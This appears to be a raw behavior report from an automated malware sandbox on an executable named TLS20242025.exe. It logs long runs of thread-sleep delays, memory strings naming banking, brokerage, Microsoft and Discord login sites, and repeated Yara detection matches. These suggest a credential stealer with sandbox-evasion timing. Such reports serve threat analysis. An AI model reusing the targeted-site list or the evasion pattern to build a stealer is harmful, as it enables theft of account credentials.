Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595125 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595015 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594905 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594796 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594687 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594575 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep count: 32 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -29514790517935264s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -600000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4948 |
Thread sleep count: 1657 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599875s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4948 |
Thread sleep count: 8201 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599765s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599656s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599546s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599437s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599327s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599218s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599109s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -599000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598890s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598781s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598671s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598562s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598453s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598343s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598234s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598125s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -598015s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597906s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597796s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597687s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597578s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597468s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597359s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597250s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597140s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -597031s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596920s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596803s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596672s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596547s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596437s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596328s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596218s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596109s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -596000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595890s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595781s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595671s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595562s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595453s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595343s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595234s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595125s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -595015s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -594905s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -594796s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -594687s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876 |
Thread sleep time: -594575s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599875 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599765 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599656 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599546 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599437 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599327 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599218 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599109 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599000 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598890 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598781 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598671 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598562 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598453 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598343 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598234 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598125 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598015 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597906 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597796 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597687 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597578 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597468 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597359 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597250 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597140 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597031 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596920 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596803 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596672 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596547 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596437 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596328 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596218 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596109 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596000 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595890 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595781 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595671 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595562 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595453 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595343 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595234 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595125 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595015 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594905 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594796 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594687 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 594575 |
Jump to behavior |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696487552u |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696487552f |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696487552x |
Source: TLS20242025.exe, 00000002.00000002.4583576880.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls>Q |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.comVMware20,11696487552} |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696487552o |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.co.inVMware20,11696487552d |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.comVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696487552j |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - HKVMware20,11696487552] |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~ |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696487552t |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^ |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696487552s |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696487552t |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696487552x |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696487552} |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Users\user\Desktop\TLS20242025.exe VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Users\user\Desktop\TLS20242025.exe VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation |
Jump to behavior |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR |